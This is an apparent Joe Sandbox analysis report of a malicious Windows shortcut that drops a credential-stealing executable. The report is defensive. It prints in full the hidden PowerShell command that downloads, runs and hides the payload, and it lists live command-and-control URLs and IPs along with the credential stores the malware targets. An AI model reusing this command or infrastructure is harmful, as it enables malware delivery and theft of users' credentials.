                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]6_2_0040317B
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_00402B7C GetProcessHeap,HeapAlloc,6_2_00402B7C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi64_4552.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4552, type: MEMORYSTR
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exeJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -command openwith.exe;(new-object system.net.webclient).downloadfile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbafrawyegfyaugeygywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').attributes += 'hidden';
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeQueries volume information: C:\Users\user\Desktop\mjtjewi.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mjtjewi.exe PID: 1392, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: PopPassword6_2_0040D069
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: SmtpPassword6_2_0040D069
                    Source: Yara matchFile source: 6.2.mjtjewi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.mjtjewi.exe.4a289b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.mjtjewi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts1
                    Command and Scripting Interpreter
                    1
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    4
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts3
                    PowerShell
                    1
                    DLL Side-Loading
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    2
                    Credentials in Registry
                    13
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information
                    Security Account Manager111
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    4
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture215
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524798 Sample: Comprobante.lnk.lnk Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 33 freighteighttwocam.ddns.net 2->33 35 www.sodiumlaurethsulfatedesyroyer.com 2->35 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 49 14 other signatures 2->49 8 powershell.exe 14 20 2->8         started        signatures3 47 Uses dynamic DNS services 33->47 process4 dnsIp5 39 www.sodiumlaurethsulfatedesyroyer.com 188.114.96.3, 443, 49710 CLOUDFLARENETUS European Union 8->39 31 C:\Users\user\Desktop\mjtjewi.exe, PE32 8->31 dropped 59 Powershell drops PE file 8->59 13 mjtjewi.exe 1 8->13         started        16 conhost.exe 1 8->16         started        18 OpenWith.exe 8->18         started        file6 signatures7 process8 signatures9 61 Detected unpacking (changes PE section rights) 13->61 63 Tries to steal Mail credentials (via file registry) 13->63 65 Machine Learning detection for dropped file 13->65 67 Injects a PE file into a foreign processes 13->67 20 mjtjewi.exe 100 13->20         started        25 mjtjewi.exe 13->25         started        27 mjtjewi.exe 13->27         started        process10 dnsIp11 37 freighteighttwocam.ddns.net 45.149.241.169, 49711, 49712, 49713 UUNETUS Germany 20->37 29 C:\Users\user\AppData\...\31437F.exe (copy), PE32 20->29 dropped 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->51 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal ftp login credentials 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 file12 signatures13

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Comprobante.lnk.lnk100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\Desktop\mjtjewi.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    freighteighttwocam.ddns.net
                    45.149.241.169
                    truetrue
                      unknown
                      www.sodiumlaurethsulfatedesyroyer.com
                      188.114.96.3
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phptrue
                          unknown
                          http://kbfvzoboss.bid/alien/fre.phptrue
                            unknown
                            http://alphastand.top/alien/fre.phptrue
                              unknown
                              http://alphastand.win/alien/fre.phptrue
                                unknown
                                http://alphastand.trade/alien/fre.phptrue
                                  unknown
                                  https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.piftrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.sodiumlaurethsulfatedesyroyer.compowershell.exe, 00000000.00000002.1464066335.0000020C4CEF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://go.micropowershell.exe, 00000000.00000002.1464066335.0000020C4C502000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.ibsensoftware.com/mjtjewi.exe, mjtjewi.exe, 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.microsoft.copowershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.sodiumlaurethsulfatedesyroyer.compowershell.exe, 00000000.00000002.1464066335.0000020C4CC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CEEE000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpymjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1464066335.0000020C4BB02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://microsoft.coFpowershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgpowershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmp, Comprobante.lnk.lnktrue
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.microsoft.cpowershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1464066335.0000020C4B8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        188.114.96.3
                                                        www.sodiumlaurethsulfatedesyroyer.comEuropean Union
                                                        13335CLOUDFLARENETUStrue
                                                        45.149.241.169
                                                        freighteighttwocam.ddns.netGermany
                                                        701UUNETUStrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1524798
                                                        Start date and time:2024-10-03 09:19:31 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 38s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:13
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Comprobante.lnk.lnk
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winLNK@12/10@3/2
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 88%
                                                        • Number of executed functions: 85
                                                        • Number of non-executed functions: 39
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .lnk
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 4552 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: Comprobante.lnk.lnk
                                                        TimeTypeDescription
                                                        03:20:39API Interceptor42x Sleep call for process: powershell.exe modified
                                                        03:20:50API Interceptor102x Sleep call for process: mjtjewi.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        188.114.96.31tstvk3Sls.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                        • microsoft-rage.world/Api/v3/qjqzqiiqayjq
                                                        http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                        • asm.alcateia.org/
                                                        hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                                                        • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                                                        z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.bayarcepat19.click/g48c/
                                                        update SOA.exeGet hashmaliciousFormBookBrowse
                                                        • www.bayarcepat19.click/5hcm/
                                                        docs.exeGet hashmaliciousFormBookBrowse
                                                        • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                        https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                        • wwvmicrosx.live/office365/office_cookies/main/
                                                        http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                        • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                        http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                        • mobilelegendsmycode.com/favicon.ico
                                                        http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                        • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        freighteighttwocam.ddns.netDetalles_del_albaran.exeGet hashmaliciousAsyncRATBrowse
                                                        • 94.156.102.141
                                                        www.sodiumlaurethsulfatedesyroyer.comPAGO.08.12.2024.lnk.lnkGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        Estado de cuenta .xlsGet hashmaliciousXenoRATBrowse
                                                        • 188.114.96.3
                                                        Comprobante_Pago.08.12.2024.lnkGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                        • 104.21.16.12
                                                        DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                        • 172.67.216.244
                                                        Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.78.54
                                                        5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.16.12
                                                        MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.78.54
                                                        UUNETUSyakov.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 71.249.27.4
                                                        yakov.m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 71.168.245.89
                                                        yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 173.77.39.174
                                                        yakov.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 139.4.200.165
                                                        novo.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 63.78.130.243
                                                        novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 141.155.190.165
                                                        novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 65.192.241.92
                                                        novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 208.210.106.232
                                                        novo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 64.36.13.201
                                                        novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 149.230.228.170
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eHesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        sostener.vbsGet hashmaliciousNjratBrowse
                                                        • 188.114.96.3
                                                        sostener.vbsGet hashmaliciousXWormBrowse
                                                        • 188.114.96.3
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 188.114.96.3
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, StealcBrowse
                                                        • 188.114.96.3
                                                        No context
                                                        Process:C:\Users\user\Desktop\mjtjewi.exe
